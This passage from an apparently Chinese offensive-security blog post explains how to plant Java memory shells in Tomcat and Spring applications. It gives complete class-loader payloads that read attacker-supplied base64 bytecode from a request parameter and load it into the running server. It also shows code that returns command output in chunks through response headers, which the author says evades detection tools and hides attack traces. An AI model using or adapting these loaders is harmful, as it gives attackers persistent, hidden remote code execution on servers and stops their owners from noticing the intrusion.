href=\"https:\/\/www.cnblogs.com\/yyhuni\/p\/shiroMemshell.html#2%E5%AF%BB%E6%89%BErequest%E5%AF%B9%E8%B1%A1\">https:\/\/www.cnblogs.com\/yyhuni\/p\/shiroMemshell.html#2%E5%AF%BB%E6%89%BErequest%E5%AF%B9%E8%B1%A1<\/a>\uff0c\u8fd9\u91cc\u8d34\u51fa\u76f8\u5e94\u4ee3\u7801\uff1a<\/p>\n\n\n\n<p><strong>Tomcat\u73af\u5883\u4e0b\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">public class ClassDataLoader extends AbstractTranslet{<br> &nbsp; &nbsp;public ClassDataLoader() throws Exception {<br> &nbsp; &nbsp; &nbsp; &nbsp;Object o;<br> &nbsp; &nbsp; &nbsp; &nbsp;String s;<br> &nbsp; &nbsp; &nbsp; &nbsp;String classData = null;<br> &nbsp; &nbsp; &nbsp; &nbsp;boolean done = false;<br> &nbsp; &nbsp; &nbsp; &nbsp;Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");<br> &nbsp; &nbsp; &nbsp; &nbsp;for (int i = 0; i &lt; ts.length; i++) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Thread t = ts[i];<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if (t == null) 
{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;continue;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;s = t.getName();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if (!s.contains(\"exec\") &amp;&amp; s.contains(\"http\")) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;o = getFV(t, \"target\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if (!(o instanceof Runnable)) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;continue;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (Exception e) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;continue;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;java.util.List ps = (java.util.List) getFV(o, \"processors\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;for (int j = 0; j &lt; ps.size(); j++) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Object p = ps.get(j);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;o = getFV(p, \"req\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Object conreq = o.getClass().getMethod(\"getNote\", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;classData = (String) conreq.getClass().getMethod(\"getParameter\", new Class[]{String.class}).invoke(conreq, new Object[]{new String(\"classData\")});<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;byte[] bytecodes = org.apache.shiro.codec.Base64.decode(classData);<br> &nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\", new Class[]{byte[].class, int.class, int.class});<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;defineClassMethod.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;cc.newInstance();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;done = true;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;if (done) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp; &nbsp;public Object getFV(Object o, String s) throws Exception {<br> &nbsp; &nbsp; &nbsp; &nbsp;java.lang.reflect.Field f = null;<br> &nbsp; &nbsp; &nbsp; &nbsp;Class clazz = o.getClass();<br> &nbsp; &nbsp; &nbsp; &nbsp;while (clazz != Object.class) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;f = clazz.getDeclaredField(s);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;break;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (NoSuchFieldException e) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;clazz = clazz.getSuperclass();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp;if (f == null) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;throw new NoSuchFieldException(s);<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; 
&nbsp;f.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp;return f.get(o);<br> &nbsp;  }<br> &nbsp; &nbsp;@Override<br> &nbsp; &nbsp;public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {<br>\u200b<br> &nbsp;  }<br> &nbsp; &nbsp;@Override<br> &nbsp; &nbsp;public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {<br>\u200b<br> &nbsp;  }<br>}<\/pre>\n\n\n\n<p><strong>Spring\u73af\u5883\u4e0b\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">public class MyClassLoader extends AbstractTranslet {<br> &nbsp; &nbsp;static{<br> &nbsp; &nbsp; &nbsp; &nbsp;try{<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;javax.servlet.http.HttpServletRequest request = ((org.springframework.web.context.request.ServletRequestAttributes)org.springframework.web.context.request.RequestContextHolder.getRequestAttributes()).getRequest();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;java.lang.reflect.Field r=request.getClass().getDeclaredField(\"request\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;r.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;org.apache.catalina.connector.Response response =((org.apache.catalina.connector.Request) r.get(request)).getResponse();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;javax.servlet.http.HttpSession session = request.getSession();<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;String classData=request.getParameter(\"classData\");<br>\u200b<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;byte[] classBytes = new sun.misc.BASE64Decoder().decodeBuffer(classData);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod(\"defineClass\",new Class[]{byte[].class, int.class, int.class});<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;defineClassMethod.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Class cc = (Class) 
defineClassMethod.invoke(MyClassLoader.class.getClassLoader(), classBytes, 0,classBytes.length);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;cc.newInstance().equals(new Object[]{request,response,session});<br> &nbsp; &nbsp; &nbsp;  }catch(Exception e){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;e.printStackTrace();<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp; &nbsp;@Override<br> &nbsp; &nbsp;public void transform(DOM arg0, SerializationHandler[] arg1) throws TransletException {<br> &nbsp;  }<br> &nbsp; &nbsp;@Override<br> &nbsp; &nbsp;public void transform(DOM arg0, DTMAxisIterator arg1, SerializationHandler arg2) throws TransletException {<br> &nbsp;  }<br>}<\/pre>\n\n\n\n<p>\u7136\u540e\u5728POST\u8bf7\u6c42\u4f53\u5904\u4f20\u5165<code>classData=\u6076\u610finterceptor\u5b57\u8282\u7801base64\u7f16\u7801<\/code> \u5373\u53ef<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4fee\u6539maxHttpHeaderSize<\/h2>\n\n\n\n<p>\u5c06Tomcat\u8fd0\u884c\u5185\u5b58\u91cc\u7684\u914d\u7f6e\u4fee\u6539\uff0c\u5bf9\u5e94Bean\u4e3a<strong><code>org.apache.coyote.http11.AbstractHttp11Protocol\u7684maxHeaderSize<\/code><\/strong><\/p>\n\n\n\n<p>\u4f46\u662f\u7531\u4e8erequest\u7684inputbuffer\u4f1a\u590d\u7528\uff0c\u6240\u4ee5\u6211\u4eec\u5728\u4fee\u6539\u5b8c\u4e4b\u540e\uff0c\u9700\u8981\u5148\u5efa\u7acb\u591a\u4e2a\u8fde\u63a5\u5c06\u590d\u7528\u7684count\u6d88\u8017\u5b8c(\u4e00\u822c\u5341\u6b21\u5de6\u53f3)\uff0c\u8ba9tomcat\u65b0\u5efarequest\u7684inputbuffer\uff0c\u8fd9\u65f6\u5019\u7684buffer\u5c31\u4f1a\u4f7f\u7528\u6211\u4eec\u4fee\u6539\u7684\u503c\u3002<\/p>\n\n\n\n<p>\u4f46\u662f\uff0c\u8fd9\u4e2a\u65b9\u6cd5\u6267\u884c\u7684\u5b57\u8282\u7801\u5176\u672c\u8eab\u957f\u5ea6\u5c31\u5f88\u957f\uff0c\u5b9e\u9645\u610f\u4e49\u4e0d\u5927\uff1b\u5e76\u4e14\u7531\u4e8e\u592a\u957f\uff0c\u8fd9\u91cc\u5c31\u4e0d\u8d34\u4ee3\u7801\u4e86\u3002<\/p>\n\n\n\n<h1 
class=\"wp-block-heading\">\u5185\u5b58\u9a6c\u56de\u663e\u53d7\u9650<\/h1>\n\n\n\n<p>\u8fd9\u4e2a\u4e3b\u8981\u5229\u7528\u573a\u666f\u662f\u5728\u4e0a\u4f20jsp\u6587\u4ef6\u89e6\u53d1\u5185\u5b58\u9a6c\u7684\u60c5\u51b5\uff08\u6ce8\u5165\u5185\u5b58\u9a6c\u4e0d\u53d7maxHttpHeaderSize\u9650\u5236\uff09<\/p>\n\n\n\n<p>\u5728\u5185\u5b58\u9a6c\u56de\u663e\u7684\u65b9\u5f0f\u4e2d<strong>(\u4e0d\u51fa\u7f51)<\/strong>\uff0c\u4e3b\u8981\u6709\u4e24\u79cd\uff1a<strong><code>response.getWriter.write(result)<\/code><\/strong>\u5c06\u56de\u663e\u5185\u5bb9\u5199\u5728<strong>Response body<\/strong>\u4e2d\uff0c\u6216\u8005\u901a\u8fc7<strong><code>response.setHeader(\"result\",result)<\/code><\/strong>\uff0c\u5c06\u56de\u663e\u5185\u5bb9\u5199\u5728\u54cd\u5e94\u5934\u91cc\u3002<\/p>\n\n\n\n<p>\u524d\u8005\u7531\u4e8e\u662f\u5728body\u4e2d\uff0c\u4e0d\u53d7maxHttpHeaderSize\u7684\u9650\u5236\uff0c\u80fd\u4f7f\u7528\u8fd9\u79cd\u65b9\u5f0f\u56de\u663e\u5f53\u7136\u662f\u5f88\u8212\u670d\u7684\u3002\u4f46\u662f\u5728\u4e00\u4e9b\u60c5\u51b5\u4e0b\uff0c\u4e0d\u5f97\u4e0d\u9009\u62e9\u5229\u7528header\u4f20\u53c2\uff1a\u50cf\u662f\u60f3\u8981\u4f7f\u7528\u4e00\u4e9b\u66f4\u4e0d\u5bb9\u6613\u88ab\u67e5\u6740\u5de5\u5177\u7684\u975eServlet\u578b\u7684\u5185\u5b58\u9a6c\uff0c\u5982Executor\u578b\uff0c\u60f3\u8981\u89e6\u53d1\u8fd9\u7c7b\u5185\u5b58\u9a6c\u5c31\u4f1a\u6d89\u53ca\u5230\u8bbf\u95ee\u4e0d\u5b58\u5728\u8def\u5f84\u7684\u8def\u5f84\u3001\u6216\u8005\u8bbf\u95ee\u5df2\u7ecf\u89c4\u8303\u4e86\u8fd4\u56de\u683c\u5f0f\u7684\u63a5\u53e3\uff0c\u5bfc\u81f4\u7684tomcat\u62a5\u9519\u8986\u76d6\u6389\u4e4b\u524d\u5728body\u4e2d\u5199\u7684\u56de\u663e\uff1b\u5e76\u4e14header\u56de\u663e\u7684\u9690\u853d\u6027\u80af\u5b9a\u6bd4body\u7684\u9690\u853d\u578b\u5927\u4e00\u70b9\uff0c\u4f60\u53ef\u4ee5\u8bbe\u7f6e\u4e00\u4e2a\u548c\u4e1a\u52a1\u76f8\u5173\u7684cookie\u540d\uff0c\u4ee5\u6b64\u62b9\u9664\u653b\u51fb\u75d5\u8ff9\u3002<\/p>\n\n\n\n<p>\u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b\uff
0c\u5c31\u53c8\u56de\u5230\u4e86\u521a\u624d\u7684\u95ee\u9898\uff1a<strong>response header\u4f9d\u65e7\u53d7maxHttpHeaderSize\u9650\u5236<\/strong>\u3002<\/p>\n\n\n\n<p>\u8fd9\u65f6\u601d\u8def\u5c31\u4e0e\u4e0a\u6587\u63d0\u5230\u7684\u7b2c\u4e8c\u79cd\u7ed5\u8fc7\u65b9\u6cd5\u7c7b\u4f3c\uff0c\u5148\u5c06\u56de\u663e\u7ed3\u679c\u4fdd\u5b58\u5230\u4e00\u4e2a\u751f\u547d\u5468\u671f\u957f\u4e8e\u5355\u6b21 Request \u7684\u53d8\u91cf\u4e2d\uff0c\u5982\u524d\u6587\u7684ThreadName\uff0c\u8ba9\u540e\u7eed\u7684 Request \u90fd\u80fd\u8bfb\u53d6\u8be5\u5b58\u50a8\uff0c\u518d\u6bcf\u6b21\u54cd\u5e94\u6309\u7167 <code>(maxHttpHeaderSize-\u5176\u5b83header\u7684\u957f\u5ea6)<\/code>\u5206\u5757\u8fd4\u56de\u7ed3\u679c\u3002<\/p>\n\n\n\n<p>\u7531\u4e8e\u8fd9\u91cc\u5df2\u7ecf\u80fd\u5728\u5185\u5b58\u4e2d\u6ce8\u5165\u7c7b\u4e86\uff0c\u90a3\u4fbf\u6709\u4e2a\u66f4\u7b80\u5355\u7684\u65b9\u6cd5\uff1a<strong>\u4f7f\u7528final\u7c7b\u578b\u4fee\u9970\u7684\u53d8\u91cf\u50a8\u5b58\u56de\u663e\u7ed3\u679c<\/strong>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">final StringBuilder result = new StringBuilder();<br> public void doAction(ServletRequest req, ServletResponse res) {<br>    .....<br> &nbsp; &nbsp;result.append(b64Output);<br> &nbsp;  .....<br> 
}<\/pre>\n\n\n\n<p>\u5e76\u4e14\u8fd8\u8981\u6ce8\u610f\u5230\u7684\u4e00\u4e2a\u70b9\u662f\u6267\u884c\u547d\u4ee4\u548c\u83b7\u53d6\u56de\u663e\u5e94\u8be5\u5206\u60c5\u51b5\u5904\u7406\uff0c\u8fd9\u91cc\u8bbe\u8ba1\u4e86\u8bf7\u6c42\u5934action\u5982\u679c\u4e3a&#8221;getResult&#8221;\u8fdb\u884c\u8bfb\u64cd\u4f5c\uff0c\u81ea\u52a8\u83b7\u53d6maxHttpHeaderSize\u5e76\u8ba1\u7b97\u5355\u6b21\u54cd\u5e94\u80fd\u591f\u8fd4\u56de\u56de\u663e\u7684\u957f\u5ea6\uff0c\u8bbe\u7f6eresult\u54cd\u5e94\u5934\u4ee5\u53caremain\u5b57\u6bb5\u544a\u77e5\u5269\u4f59\u957f\u5ea6\uff1b\u5982\u679c\u4e3a\u5176\u5b83\u5219\u6267\u884c\u547d\u4ee4\uff0c\u5c06\u6267\u884c\u7ed3\u679c\u6216\u9519\u8bef\u3001\u5f02\u5e38\u7ed3\u679c\u5b58\u5165result\uff0c\u5982\u679c\u6210\u529f\u6267\u884c\u8fd4\u56de&#8221;execute success&#8221;\uff0c\u5931\u8d25\u5219&#8221;execute fail&#8221;\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> String action = tomcatReq.getHeader(\"action\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if (\"getResult\".equals(action)) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  ...<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tomcatReq.setAttribute(\"remainingBase64\", nextRem);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tomcatRes.setHeader(\"result\", part);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }else if(action != null){<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  ...<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 
}<\/pre>\n\n\n\n<p>\u5e76\u4e14\u4e3a\u4e86\u4fbf\u4e8e\u79fb\u690d\u5230\u5176\u5b83\u5185\u5b58\u9a6c\uff0c\u8fd9\u91cc\u9664\u4e86\u5c06\u6240\u6709\u903b\u8f91\u5c01\u88c5\u5230\u4e86\u4e00\u4e2a\u65b9\u6cd5\u4e2d\uff0c\u8fd8\u76f4\u63a5\u652f\u6301\u4e86\u5c06ServletRequest\u3001ServletResponse\u63a5\u53e3\u4f5c\u4e3a\u5165\u53c2\uff0c\u5728\u65b9\u6cd5\u4e2d\u5148\u8fdb\u884c\u5f3a\u8f6c\u4e3a<code>org.apache.catalina.connector.Request<\/code>\u3001<code>org.apache.catalina.connector.Response<\/code>\uff0c\u4ee5\u4fbf\u4e8e\u6240\u6709tomcat\u5185\u5b58\u9a6c\u90fd\u80fd\u76f4\u63a5\u8c03\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> &nbsp; &nbsp; &nbsp;HttpServletRequest httpReq = (HttpServletRequest) req;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;HttpServletResponse httpRes = (HttpServletResponse) res;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\/\/\u83b7\u53d6\u5185\u90e8Tomcat Request<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Request tomcatReq;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Field reqField = httpReq.getClass().getDeclaredField(\"request\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;reqField.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tomcatReq = (Request) reqField.get(httpReq);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (NoSuchFieldException ignored) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Method getReqM = httpReq.getClass().getMethod(\"getRequest\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tomcatReq = (Request) getReqM.invoke(httpReq);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\/\/\u83b7\u53d6\u5185\u90e8Tomcat Response<br> &nbsp; &nbsp; &nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Response tomcatRes;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;try {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Field resField = httpRes.getClass().getDeclaredField(\"response\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;resField.setAccessible(true);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tomcatRes = (Response) resField.get(httpRes);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } catch (NoSuchFieldException ignored) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;Method getResM = httpRes.getClass().getMethod(\"getResponse\");<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;tomcatRes = (Response) getResM.invoke(httpRes);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; ......<\/pre>\n\n\n\n<p>Servlet\u5185\u5b58\u9a6c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> &nbsp;public void service(ServletRequest req, ServletResponse res) throws ServletException, IOException {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;doAction(req,res);<br> &nbsp; &nbsp; &nbsp;  }<\/pre>\n\n\n\n<p>Value\u5185\u5b58\u9a6c\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"> public void invoke(Request request, Response response) throws IOException, ServletException {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;doAction(request,response);<br> &nbsp; &nbsp; &nbsp;  }<\/pre>\n\n\n\n<p>\u8fd9\u91cc\u62ffServlet\u5185\u5b58\u9a6c\u4e3e\u4e2a\u4f8b\uff0c\u5b9e\u9a8c\u4ee3\u7801\u653e\u5728\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-embed\"><div 
class=\"wp-block-embed__wrapper\">\nhttps:\/\/github.com\/byname66\/demo-projects\/blob\/main\/memoryshell\/ServletTestShell.jsp\n<\/div><\/figure>\n\n\n\n<p>\u4e3a\u4e86\u8425\u9020\u5b9e\u6218\u53d7\u9650\u573a\u666f\uff0c\u8fd9\u91cc\u76f4\u63a5\u5728server.xml\u4e2d\u8bbe\u7f6emaxHttpHeaderSize=&#8221;1000&#8243;<\/p>\n\n\n\n<p><img decoding=\"async\" alt=\"image-20250625040931434\" src=\"https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625040931434.png\">!]<\/p>\n\n\n\n<p>\u6784\u9020\u5185\u5b58\u9a6c\u540e\u6267\u884cipconfig\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625040014663.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625040014663.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250625040014663\"\/><\/div><\/figure>\n\n\n\n<p>\u4f20\u53c2getResult\u83b7\u53d6\u5230\u5206\u5757\u4f20\u8f93\u7684\u5b57\u7b26\u4e32\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625041111408.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625041111408.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250625041111408\"\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625041445981.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/byname.oss-cn-chengdu.aliyuncs.com\/image-20250625041445981.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250625041445981\"\/><\/div><\/figure>\n\n\n\n<p>&#8230;&#8230;<\/p>\n\n\n\n<p>\u6700\u540e\u5408\u5e76\u8d77\u6765\u89e3\u7801\u6210\u529f\u83b7\u53d6\u5b8c\u6574\u6570\u636e\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/byname6.cn\/wp-content\/uploads\/2025\/06\/image-1024x561.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"561\" data-original=\"http:\/\/byname6.cn\/wp-content\/uploads\/2025\/06\/image-1024x561.png\" 
